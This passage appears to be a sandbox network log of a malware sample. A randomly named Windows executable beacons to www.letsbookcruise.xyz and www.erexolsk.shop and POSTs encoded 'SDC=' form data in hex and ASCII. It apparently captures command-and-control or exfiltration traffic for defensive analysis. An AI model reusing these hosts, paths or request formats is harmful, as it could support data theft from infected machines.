SDC=JvfE7tlpLnDfDNISyyyw8s4vvkS4vMf83fFJVpJ0iuwucZH1SdZt1Uqk9sN2LFORH37Z1dXrcNKAQIKyoKZSl1s3lPooYoTQ7in5H+y5ZaQBR81mTT6dovqkMJaq3pMwwAINumnnDB5/Z8zDDoQ2dNP82Jxbs2VZz+qsy0fRSnKPB11s3PRudflIn4M2JrgF9QVz2edINKIK7fKUvm5dyyOVVNyzCHsgx+zchAIWqjoBAAiPQU287Mjd592AjtmaIie1/P/kIM4qk+TQDvFobk/AaR81VIsgIUDPRNVPIcXfC4O3RypkmfdoQvgsxZB0T0MwJiQ8zNI2XUcTvWvCANZCWeHYU4HIlZd/E4g79pSdp8CEMyXe75BWbVcH9nqv25hEgvF2mEVa8B/ilFtzLzFDHrzyS3qiqCv1HMdqawnHhN10NF0UENgFbVJ1gHIYvIkMl8vAW699BEZvkTzdcfTOg737fSvabChpkevXqi0RTqkfK0W6kbeqBpKcCsoXUKi+K3h5NqGYfQjvZZKH3kZ9E4jT4OEz3mfpY/2YtimWOmpLJjFw3ekd27g2z8GBSj6ZmByX9bXUJ/6Lja+YiLqUQiFekRKFgbQNsWE5oMtfScgwQXlm2Ye3Nk+AGvGx0EO0qBUAPiAMfhHrdwROlaMMA7Hdrxpj9bsl5FodCkw582bXHDckz2jT20yE5Y67cnXGsWnmkJplVS0biC6TtoDMpTg0y/mzP8YcrnlhOz6ch9RKMrbqfO6ZVyIaozlMS6mdaVJNAObmQy/F5KYs/JRsVx7VI5jDRscEyvPXc/fRTDGPN330zygHVuvYRKK5qE3ByOxEOA9Ik499ORsbUOOCjGVEsjFku2T6TrtpWUS2JXcm026IRC5jiHHmgXpMWTga8l9ALCcw+MmoDYZ9an4r5lnHZcj1TQhlK/t1aIOGRXtf4m9NYpT3GIJYLtCEOEJ0pllS+zejNNDOUsBbUZ3prBUMZJjsqCKS5Wr1QM+MlY9f [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.10	50012	85.159.66.93	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:15:57.308882952 CET	482	OUT	GET /kbfm/?SDC=Et3k4bdkHTaBSJAD+wWT8rM2olXJoeWF+cxPd+han41yLeLBYYxv+G2j6PtMFGmyeyrg8tSufO7cfo6aybBH4l4Erf9TSM3qsmv+bYmxao8hYYxwGw==&mH=CpePy0P HTTP/1.1 Host: www.letsbookcruise.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 10, 2025 18:15:58.014405966 CET	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Fri, 10 Jan 2025 17:15:57 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2025-01-10T17:16:02.9054501Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.10	50013	85.159.66.93	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:16:03.052696943 CET	759	OUT	POST /kbfm/ HTTP/1.1 Host: www.letsbookcruise.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.letsbookcruise.xyz Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 192 Connection: close Referer: http://www.letsbookcruise.xyz/kbfm/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 4a 76 66 45 37 74 6c 70 4c 6e 44 66 41 74 59 53 78 56 6d 77 33 73 34 77 67 45 53 34 6c 73 66 77 33 66 4a 4a 56 73 78 6b 69 63 38 75 46 71 50 31 53 37 74 74 6c 6b 71 6b 70 63 4e 79 50 46 4f 4c 48 33 2f 2f 31 63 6d 4a 63 50 6d 41 53 76 57 79 38 35 68 52 39 31 73 78 68 50 6f 72 59 6f 53 53 37 69 33 31 48 2b 32 66 5a 61 49 42 52 4f 74 6d 48 7a 36 65 6b 50 71 6b 4d 4a 61 32 33 70 4d 59 77 41 42 53 75 69 4b 36 44 7a 78 2f 5a 66 33 44 4d 75 59 31 62 4e 50 34 71 5a 77 78 39 33 6c 4a 70 37 47 49 30 6c 6e 65 49 31 48 6f 52 69 4a 6e 79 64 78 6a 53 65 35 54 32 2f 4a 63 Data Ascii: SDC=JvfE7tlpLnDfAtYSxVmw3s4wgES4lsfw3fJJVsxkic8uFqP1S7ttlkqkpcNyPFOLH3//1cmJcPmASvWy85hR91sxhPorYoSS7i31H+2fZaIBROtmHz6ekPqkMJa23pMYwABSuiK6Dzx/Zf3DMuY1bNP4qZwx93lJp7GI0lneI1HoRiJnydxjSe5T2/Jc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.10	50014	85.159.66.93	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:16:05.597978115 CET	783	OUT	POST /kbfm/ HTTP/1.1 Host: www.letsbookcruise.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.letsbookcruise.xyz Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 216 Connection: close Referer: http://www.letsbookcruise.xyz/kbfm/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 4a 76 66 45 37 74 6c 70 4c 6e 44 66 44 4e 49 53 79 79 79 77 38 73 34 76 76 6b 53 34 76 4d 66 38 33 66 46 4a 56 70 4a 30 69 76 49 75 63 4a 62 31 41 71 74 74 6b 6b 71 6b 78 4d 4e 33 4c 46 4f 51 48 33 7a 64 31 63 71 4a 63 4c 47 41 53 72 53 79 39 4f 4e 53 2f 6c 73 33 6f 76 6f 74 57 49 53 53 37 69 33 31 48 2b 69 35 5a 61 51 42 52 2f 39 6d 45 52 53 64 6c 50 71 6a 63 5a 61 32 6d 35 4d 63 77 41 42 77 75 6e 54 64 44 77 5a 2f 5a 61 54 44 50 37 34 32 52 4e 50 2b 33 4a 78 44 73 32 59 65 7a 2f 43 67 79 30 37 33 53 6c 61 50 53 44 30 67 6a 4d 51 30 42 70 6c 64 34 35 38 32 42 39 77 79 37 7a 63 4e 35 64 46 57 65 59 68 67 37 76 48 69 74 67 3d 3d Data Ascii: SDC=JvfE7tlpLnDfDNISyyyw8s4vvkS4vMf83fFJVpJ0ivIucJb1AqttkkqkxMN3LFOQH3zd1cqJcLGASrSy9ONS/ls3ovotWISS7i31H+i5ZaQBR/9mERSdlPqjcZa2m5McwABwunTdDwZ/ZaTDP742RNP+3JxDs2Yez/Cgy073SlaPSD0gjMQ0Bpld4582B9wy7zcN5dFWeYhg7vHitg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.10	50015	85.159.66.93	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:16:08.143644094 CET	1796	OUT	POST /kbfm/ HTTP/1.1 Host: www.letsbookcruise.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.letsbookcruise.xyz Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1228 Connection: close Referer: http://www.letsbookcruise.xyz/kbfm/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 4a 76 66 45 37 74 6c 70 4c 6e 44 66 44 4e 49 53 79 79 79 77 38 73 34 76 76 6b 53 34 76 4d 66 38 33 66 46 4a 56 70 4a 30 69 75 77 75 63 5a 48 31 53 64 5a 74 31 55 71 6b 39 73 4e 32 4c 46 4f 52 48 33 37 5a 31 64 58 72 63 4e 4b 41 51 49 4b 79 6f 4b 5a 53 6c 31 73 33 6c 50 6f 6f 59 6f 54 51 37 69 6e 35 48 2b 79 35 5a 61 51 42 52 38 31 6d 54 54 36 64 6f 76 71 6b 4d 4a 61 71 33 70 4d 77 77 41 49 4e 75 6d 6e 6e 44 42 35 2f 5a 38 7a 44 44 6f 51 32 64 4e 50 38 32 4a 78 62 73 32 56 5a 7a 2b 71 73 79 30 66 52 53 6e 4b 50 42 31 31 73 33 50 52 75 64 66 6c 49 6e 34 4d 32 4a 72 67 46 39 51 56 7a 32 65 64 49 4e 4b 49 4b 37 66 4b 55 76 6d 35 64 79 79 4f 56 56 4e 79 7a 43 48 73 67 78 2b 7a 63 68 41 49 57 71 6a 6f 42 41 41 69 50 51 55 32 38 37 4d 6a 64 35 39 32 41 6a 74 6d 61 49 69 65 31 2f 50 2f 6b 49 4d 34 71 6b 2b 54 51 44 76 46 6f 62 6b 2f 41 61 52 38 31 56 49 73 67 49 55 44 50 52 4e 56 50 49 63 58 66 43 34 4f 33 52 79 70 6b 6d 66 64 6f 51 76 67 73 78 5a 42 30 54 30 4d 77 4a 69 51 38 7a 4e 49 32 58 55 [TRUNCATED] Data Ascii: SDC=JvfE7tlpLnDfDNISyyyw8s4vvkS4vMf83fFJVpJ0iuwucZH1SdZt1Uqk9sN2LFORH37Z1dXrcNKAQIKyoKZSl1s3lPooYoTQ7in5H+y5ZaQBR81mTT6dovqkMJaq3pMwwAINumnnDB5/Z8zDDoQ2dNP82Jxbs2VZz+qsy0fRSnKPB11s3PRudflIn4M2JrgF9QVz2edINKIK7fKUvm5dyyOVVNyzCHsgx+zchAIWqjoBAAiPQU287Mjd592AjtmaIie1/P/kIM4qk+TQDvFobk/AaR81VIsgIUDPRNVPIcXfC4O3RypkmfdoQvgsxZB0T0MwJiQ8zNI2XUcTvWvCANZCWeHYU4HIlZd/E4g79pSdp8CEMyXe75BWbVcH9nqv25hEgvF2mEVa8B/ilFtzLzFDHrzyS3qiqCv1HMdqawnHhN10NF0UENgFbVJ1gHIYvIkMl8vAW699BEZvkTzdcfTOg737fSvabChpkevXqi0RTqkfK0W6kbeqBpKcCsoXUKi+K3h5NqGYfQjvZZKH3kZ9E4jT4OEz3mfpY/2YtimWOmpLJjFw3ekd27g2z8GBSj6ZmByX9bXUJ/6Lja+YiLqUQiFekRKFgbQNsWE5oMtfScgwQXlm2Ye3Nk+AGvGx0EO0qBUAPiAMfhHrdwROlaMMA7Hdrxpj9bsl5FodCkw582bXHDckz2jT20yE5Y67cnXGsWnmkJplVS0biC6TtoDMpTg0y/mzP8YcrnlhOz6ch9RKMrbqfO6ZVyIaozlMS6mdaVJNAObmQy/F5KYs/JRsVx7VI5jDRscEyvPXc/fRTDGPN330zygHVuvYRKK5qE3ByOxEOA9Ik499ORsbUOOCjGVEsjFku2T6TrtpWUS2JXcm026IRC5jiHHmgXpMWTga8l9ALCcw+MmoDYZ9an4r5lnHZcj1TQhlK/t1aIOGRXtf4m9NYpT3GIJYLtCEOEJ0pllS+zejNNDOUsBbUZ3prBUMZJjsqCKS5Wr1QM+MlY9f [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.10	50016	85.159.66.93	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:16:10.941294909 CET	482	OUT	GET /kbfm/?SDC=Et3k4bdkHTaBSJAD+wWT8rM2olXJoeWF+cxPd+han41yLeLBYYxv+G2j6PtMFGmyeyrg8tSufO7cfo6aybBH4l4Erf9TSM3qsmv+bYmxao8hYYxwGw==&mH=CpePy0P HTTP/1.1 Host: www.letsbookcruise.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 10, 2025 18:16:11.436729908 CET	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Fri, 10 Jan 2025 17:16:11 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2025-01-10T17:16:16.3272890Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.10	50017	13.228.81.39	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:16:16.694752932 CET	744	OUT	POST /e69q/ HTTP/1.1 Host: www.erexolsk.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.erexolsk.shop Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 192 Connection: close Referer: http://www.erexolsk.shop/e69q/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 46 6a 32 5a 37 38 4d 4d 37 50 6b 56 6f 78 69 6b 4b 6b 57 69 74 6e 49 39 76 5a 42 74 7a 55 38 43 71 53 73 50 49 72 73 4f 52 59 57 38 44 59 52 35 70 72 4a 4c 58 4b 2b 66 79 32 35 41 73 76 4a 6f 61 67 69 43 43 69 6c 45 71 4b 45 73 70 63 38 39 6e 72 36 57 56 71 48 31 78 69 42 62 37 49 51 68 64 54 30 35 4b 6d 34 30 74 62 71 77 6c 76 73 70 70 2b 53 32 73 4a 39 70 41 5a 7a 46 73 55 52 41 44 57 72 4e 61 37 48 50 6b 31 5a 64 5a 63 2b 78 32 6a 4a 30 42 2f 46 6e 6d 65 62 35 39 36 44 65 45 31 4e 32 31 73 4c 59 6e 2b 62 66 7a 78 77 63 47 35 30 51 66 76 39 79 64 68 4a 79 Data Ascii: SDC=Fj2Z78MM7PkVoxikKkWitnI9vZBtzU8CqSsPIrsORYW8DYR5prJLXK+fy25AsvJoagiCCilEqKEspc89nr6WVqH1xiBb7IQhdT05Km40tbqwlvspp+S2sJ9pAZzFsURADWrNa7HPk1ZdZc+x2jJ0B/Fnmeb596DeE1N21sLYn+bfzxwcG50Qfv9ydhJy
Jan 10, 2025 18:16:17.529623985 CET	364	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Fri, 10 Jan 2025 17:16:17 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.erexolsk.shop/e69q/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.10	50018	13.228.81.39	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:16:19.261136055 CET	768	OUT	POST /e69q/ HTTP/1.1 Host: www.erexolsk.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.erexolsk.shop Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 216 Connection: close Referer: http://www.erexolsk.shop/e69q/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 46 6a 32 5a 37 38 4d 4d 37 50 6b 56 75 52 53 6b 52 47 2b 69 6f 48 49 2b 78 4a 42 74 34 30 38 47 71 53 67 50 49 76 38 6e 52 72 79 38 44 38 56 35 76 65 6c 4c 57 4b 2b 66 35 57 35 2f 6f 76 49 71 61 67 75 77 43 6e 6c 45 71 4b 41 73 70 65 6b 39 6b 63 6d 4a 56 36 48 4e 6c 53 42 56 30 6f 51 68 64 54 30 35 4b 6d 38 4f 74 62 79 77 6c 66 38 70 6f 64 4b 31 68 70 39 32 48 5a 7a 46 6f 55 52 45 44 57 72 76 61 36 62 70 6b 33 52 64 5a 64 4f 78 32 78 68 7a 50 2f 46 68 6f 2b 61 77 38 4a 32 55 64 45 31 31 77 63 6d 4d 67 34 4f 33 39 77 4e 62 58 6f 56 48 4d 59 68 38 54 6e 38 59 61 53 44 48 35 33 49 41 53 35 76 4a 6e 39 32 5a 65 38 79 4d 62 51 3d 3d Data Ascii: SDC=Fj2Z78MM7PkVuRSkRG+ioHI+xJBt408GqSgPIv8nRry8D8V5velLWK+f5W5/ovIqaguwCnlEqKAspek9kcmJV6HNlSBV0oQhdT05Km8Otbywlf8podK1hp92HZzFoUREDWrva6bpk3RdZdOx2xhzP/Fho+aw8J2UdE11wcmMg4O39wNbXoVHMYh8Tn8YaSDH53IAS5vJn92Ze8yMbQ==
Jan 10, 2025 18:16:20.233159065 CET	364	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Fri, 10 Jan 2025 17:16:20 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.erexolsk.shop/e69q/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.10	50019	13.228.81.39	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:16:21.814047098 CET	1781	OUT	POST /e69q/ HTTP/1.1 Host: www.erexolsk.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.erexolsk.shop Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1228 Connection: close Referer: http://www.erexolsk.shop/e69q/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 46 6a 32 5a 37 38 4d 4d 37 50 6b 56 75 52 53 6b 52 47 2b 69 6f 48 49 2b 78 4a 42 74 34 30 38 47 71 53 67 50 49 76 38 6e 52 72 36 38 41 4a 42 35 73 39 64 4c 51 36 2b 66 36 57 35 36 6f 76 4a 79 61 68 47 30 43 6e 5a 79 71 49 49 73 70 2f 45 39 7a 5a 53 4a 4d 4b 48 4e 36 43 42 59 37 49 52 70 64 54 45 31 4b 6d 4d 4f 74 62 79 77 6c 5a 77 70 38 2b 53 31 6e 70 39 70 41 5a 79 4b 73 55 52 38 44 57 6a 46 61 36 65 53 6b 48 78 64 61 39 65 78 78 43 4a 7a 48 2f 46 6a 34 75 61 6f 38 4a 71 58 64 45 6f 4d 77 63 6a 45 67 2f 43 33 39 52 31 45 4c 4b 46 63 53 4a 5a 6b 51 30 64 79 52 48 71 76 2b 6d 70 6d 5a 5a 4b 56 2f 2f 76 73 62 2b 66 41 59 43 39 4f 76 4e 76 4e 37 71 77 36 4f 4c 70 31 72 4f 61 5a 5a 7a 63 2b 72 6e 5a 2b 4c 43 2b 68 52 63 64 50 78 5a 70 6b 4b 69 6b 30 44 75 6c 49 57 6a 56 33 46 61 69 4e 30 33 43 6a 48 39 55 34 7a 58 70 35 4d 59 73 53 74 54 4f 75 69 61 78 74 31 78 46 64 66 49 30 69 54 63 44 56 56 57 4d 33 53 35 6c 45 75 41 76 63 51 33 43 68 6e 72 63 41 65 6a 54 44 6f 74 47 48 4d 56 32 69 42 64 [TRUNCATED] Data Ascii: SDC=Fj2Z78MM7PkVuRSkRG+ioHI+xJBt408GqSgPIv8nRr68AJB5s9dLQ6+f6W56ovJyahG0CnZyqIIsp/E9zZSJMKHN6CBY7IRpdTE1KmMOtbywlZwp8+S1np9pAZyKsUR8DWjFa6eSkHxda9exxCJzH/Fj4uao8JqXdEoMwcjEg/C39R1ELKFcSJZkQ0dyRHqv+mpmZZKV//vsb+fAYC9OvNvN7qw6OLp1rOaZZzc+rnZ+LC+hRcdPxZpkKik0DulIWjV3FaiN03CjH9U4zXp5MYsStTOuiaxt1xFdfI0iTcDVVWM3S5lEuAvcQ3ChnrcAejTDotGHMV2iBdQolXT2ZmpulzG5tekY+QJhjsC1znNzAhO/vTMBHfYMuAm/+BIRNzYuR/YygtTRoCmZPNb4Z7Up9z06yiqYwci7484IdoUwtTmbAKzZ5+wmveYvfNHLcAUbRi0QZzdm4VQ186iDmghLX1xRIxlmR90oTMu2OlxK2QFhhHbtuCtx6Vh6xszrSnY+hyk/qEuYzVaub1v1TMw6bFO48ePVXhPQTLksmSfV9hH84rOFZP4FHuoKR++yITBl8EpSVEjiqhbR2X3Q93W6F6PWqVHaX3PlR8pKOEYlbEnoDGs/d1Qx3o7phbcRrIiW/U9zy4P50+xY4V78OkJxLekCXun7Pj+M8Qouu6a5Hme0wCkXlPri7jFNPRY4YHYZKN6ustii1RI2fWHjm0FA2SKHsa4u4o2YgD7n/QKLtfkB7nKSKY5pmeyfTUbzaTkBVzeGAHiUrEaOXsmItRfTTTeUR7TEVWGirIS4V2LdOeJFFxUbc1/o24TY6geTJHmJyNMn1WEBGRb0y/sw6loVHac0Fpmwqe4zpgaNk+0tabydx9mmXULvnbQYU4jHsa0+862OFQU5HZm2Tq70PunxE5BkHRD5gED3WeiE5QxuFvC/oSN2mGFlccaqKWIgjCtO7SXJCEce2fR7ICJg3YK95npUQOWwbDIs4haRflJ+kddb [TRUNCATED]
Jan 10, 2025 18:16:22.746313095 CET	364	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Fri, 10 Jan 2025 17:16:22 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.erexolsk.shop/e69q/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.10	50020	13.228.81.39	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:16:24.354099989 CET	477	OUT	GET /e69q/?SDC=Ihe54J8FxOdLpDLvAVmEpnE90Z1v01c1zwkBMMYSe/+kPN842+xeNKH4+BVPm4ZLCnayEF9DpIt9hcAcqJy+Rof05i4/0bkcF0VebTYcrL7tp/059g==&mH=CpePy0P HTTP/1.1 Host: www.erexolsk.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 10, 2025 18:16:25.313288927 CET	496	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Fri, 10 Jan 2025 17:16:25 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.erexolsk.shop/e69q/?SDC=Ihe54J8FxOdLpDLvAVmEpnE90Z1v01c1zwkBMMYSe/+kPN842+xeNKH4+BVPm4ZLCnayEF9DpIt9hcAcqJy+Rof05i4/0bkcF0VebTYcrL7tp/059g==&mH=CpePy0P Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.10	50021	188.114.96.3	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
